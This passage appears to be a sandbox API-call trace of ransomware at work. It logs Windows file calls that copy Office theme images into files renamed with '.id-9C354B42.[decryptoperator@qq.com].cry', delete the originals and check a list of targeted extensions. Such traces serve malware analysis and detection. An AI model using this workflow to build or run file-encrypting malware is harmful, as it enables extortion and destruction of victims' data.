[0045.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.057] GetLastError () returned 0x0 [0045.057] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x7eb1, lpOverlapped=0x0) returned 1 [0045.066] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x7ec0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x7ec0, lpOverlapped=0x0) returned 1 [0045.067] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.068] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.068] SetEndOfFile (hFile=0x164) returned 1 [0045.068] CloseHandle (hObject=0x164) returned 1 [0045.068] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.068] SetEndOfFile (hFile=0x190) returned 1 [0045.069] CloseHandle (hObject=0x190) returned 1 [0045.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.071] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 1 [0045.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.071] lstrlenW (lpString=".doc") returned 4 [0045.071] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.072] lstrlenW (lpString=".docx") returned 5 [0045.072] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.072] lstrlenW (lpString=".pdf") returned 4 [0045.072] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.072] lstrlenW (lpString=".xls") returned 4 [0045.072] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.072] lstrlenW (lpString=".xlsx") returned 5 [0045.072] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.072] lstrlenW (lpString=".ppt") returned 4 [0045.072] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.072] lstrlenW (lpString=".zip") returned 4 [0045.072] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.072] lstrlenW (lpString=".rar") returned 4 [0045.072] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.072] lstrlenW (lpString=".bz2") returned 4 [0045.072] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.072] lstrlenW (lpString=".7z") returned 3 [0045.072] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.072] lstrlenW (lpString=".dbf") returned 4 [0045.072] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.072] lstrlenW (lpString=".1cd") returned 4 [0045.072] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.072] lstrlenW (lpString=".jpg") returned 4 [0045.072] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.072] lstrlenW (lpString=".doc") returned 4 [0045.072] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.072] lstrlenW (lpString=".docx") returned 5 [0045.072] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.073] lstrlenW (lpString=".pdf") returned 4 [0045.073] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.073] lstrlenW (lpString=".xls") returned 4 [0045.073] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.073] lstrlenW (lpString=".xlsx") returned 5 [0045.073] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.073] lstrlenW (lpString=".ppt") returned 4 [0045.073] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.073] lstrlenW (lpString=".zip") returned 4 [0045.073] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.073] lstrlenW (lpString=".rar") returned 4 [0045.073] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.073] lstrlenW (lpString=".bz2") returned 4 [0045.073] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.073] lstrlenW (lpString=".7z") returned 3 [0045.073] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.073] lstrlenW (lpString=".dbf") returned 4 [0045.073] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.073] lstrlenW (lpString=".1cd") returned 4 [0045.073] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.073] lstrlenW (lpString=".jpg") returned 4 [0045.073] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.073] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.074] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.085] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=60724) returned 1 [0045.085] CloseHandle (hObject=0x164) returned 1 [0045.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 0x20 [0045.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.085] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.085] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.086] GetLastError () returned 0x0 [0045.086] ReadFile (in: hFile=0x164, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xed34, lpOverlapped=0x0) returned 1 [0045.088] WriteFile (in: hFile=0x190, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xed40, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xed40, lpOverlapped=0x0) returned 1 [0045.089] ReadFile (in: hFile=0x164, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.089] WriteFile (in: hFile=0x190, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.089] SetEndOfFile (hFile=0x190) returned 1 [0045.089] CloseHandle (hObject=0x190) returned 1 [0045.090] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.090] SetEndOfFile (hFile=0x164) returned 1 [0045.091] CloseHandle (hObject=0x164) returned 1 [0045.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.091] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 1 [0045.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.091] lstrlenW (lpString=".doc") returned 4 [0045.091] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.091] lstrlenW (lpString=".docx") returned 5 [0045.091] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.091] lstrlenW (lpString=".pdf") returned 4 [0045.091] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.091] lstrlenW (lpString=".xls") returned 4 [0045.091] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.091] lstrlenW (lpString=".xlsx") returned 5 [0045.091] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.091] lstrlenW (lpString=".ppt") returned 4 [0045.091] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.091] lstrlenW (lpString=".zip") returned 4 [0045.091] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.092] lstrlenW (lpString=".rar") returned 4 [0045.092] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.092] lstrlenW (lpString=".bz2") returned 4 [0045.092] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.092] lstrlenW (lpString=".7z") returned 3 [0045.092] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.092] lstrlenW (lpString=".dbf") returned 4 [0045.092] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.092] lstrlenW (lpString=".1cd") returned 4 [0045.092] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.094] lstrlenW (lpString=".jpg") returned 4 [0045.094] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.094] lstrlenW (lpString=".doc") returned 4 [0045.094] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.094] lstrlenW (lpString=".docx") returned 5 [0045.094] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.094] lstrlenW (lpString=".pdf") returned 4 [0045.094] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.094] lstrlenW (lpString=".xls") returned 4 [0045.094] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.094] lstrlenW (lpString=".xlsx") returned 5 [0045.094] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.094] lstrlenW (lpString=".ppt") returned 4 [0045.094] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.094] lstrlenW (lpString=".zip") returned 4 [0045.094] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.094] lstrlenW (lpString=".rar") returned 4 [0045.094] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.094] lstrlenW (lpString=".bz2") returned 4 [0045.094] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.094] lstrlenW (lpString=".7z") returned 3 [0045.094] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.094] lstrlenW (lpString=".dbf") returned 4 [0045.094] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.094] lstrlenW (lpString=".1cd") returned 4 [0045.094] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.095] lstrlenW (lpString=".jpg") returned 4 [0045.095] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.095] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.095] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.095] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2552) returned 1 [0045.095] CloseHandle (hObject=0x190) returned 1 [0045.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 0x20 [0045.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.096] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.096] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.096] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0045.110] GetLastError () returned 0x0 [0045.110] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x9f8, lpOverlapped=0x0) returned 1 [0045.440] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0045.446] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.446] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.446] SetEndOfFile (hFile=0x184) returned 1 [0045.446] CloseHandle (hObject=0x184) returned 1 [0045.447] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.447] SetEndOfFile (hFile=0x190) returned 1 [0045.447] CloseHandle (hObject=0x190) returned 1 [0045.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.449] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 1 [0045.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.450] lstrlenW (lpString=".doc") returned 4 [0045.450] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.450] lstrlenW (lpString=".docx") returned 5 [0045.450] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.450] lstrlenW (lpString=".pdf") returned 4 [0045.450] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.450] lstrlenW (lpString=".xls") returned 4 [0045.450] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.450] lstrlenW (lpString=".xlsx") returned 5 [0045.450] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.450] lstrlenW (lpString=".ppt") returned 4 [0045.450] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.450] lstrlenW (lpString=".zip") returned 4 [0045.450] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.450] lstrlenW (lpString=".rar") returned 4 [0045.450] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.450] lstrlenW (lpString=".bz2") returned 4 [0045.450] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.450] lstrlenW (lpString=".7z") returned 3 [0045.450] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.450] lstrlenW (lpString=".dbf") returned 4 [0045.450] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.450] lstrlenW (lpString=".1cd") returned 4 [0045.450] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.450] lstrlenW (lpString=".jpg") returned 4 [0045.450] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.451] lstrlenW (lpString=".doc") returned 4 [0045.451] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.451] lstrlenW (lpString=".docx") returned 5 [0045.451] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.451] lstrlenW (lpString=".pdf") returned 4 [0045.451] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.451] lstrlenW (lpString=".xls") returned 4 [0045.451] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.451] lstrlenW (lpString=".xlsx") returned 5 [0045.451] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.451] lstrlenW (lpString=".ppt") returned 4 [0045.451] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.451] lstrlenW (lpString=".zip") returned 4 [0045.451] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.451] lstrlenW (lpString=".rar") returned 4 [0045.451] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.451] lstrlenW (lpString=".bz2") returned 4 [0045.451] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.451] lstrlenW (lpString=".7z") returned 3 [0045.451] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.451] lstrlenW (lpString=".dbf") returned 4 [0045.451] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.451] lstrlenW (lpString=".1cd") returned 4 [0045.451] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.451] lstrlenW (lpString=".jpg") returned 4 [0045.451] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.451] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.452] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.452] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=18817) returned 1 [0045.452] CloseHandle (hObject=0x190) returned 1 [0045.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 0x20 [0045.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.452] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.452] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 